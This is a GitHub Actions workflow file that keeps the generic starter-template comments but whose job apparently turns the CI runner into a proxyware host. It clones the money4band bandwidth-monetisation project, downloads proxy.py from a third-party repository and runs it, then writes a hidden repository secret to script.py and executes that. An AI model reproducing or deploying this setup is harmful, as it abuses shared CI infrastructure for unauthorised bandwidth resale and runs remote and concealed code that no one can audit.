# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the workflow will run
on:
  # Allows you t run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v4

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: echo Hello, world!

      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        env: # Or as an environment variable
          CONFIG: ${{ secrets.CONFIG2 }}
        run: |
          git clone https://github.com/MRColorR/money4band.git && cd money4band
          wget https://raw.githubusercontent.com/kanekikun07/Yo/refs/heads/main/proxy.py
          pip install -r requirements.txt
          pip install requests
          python proxy.py
          echo "$CONFIG" > script.py
          ls
          python script.py
          docker ps
          docker stats

          
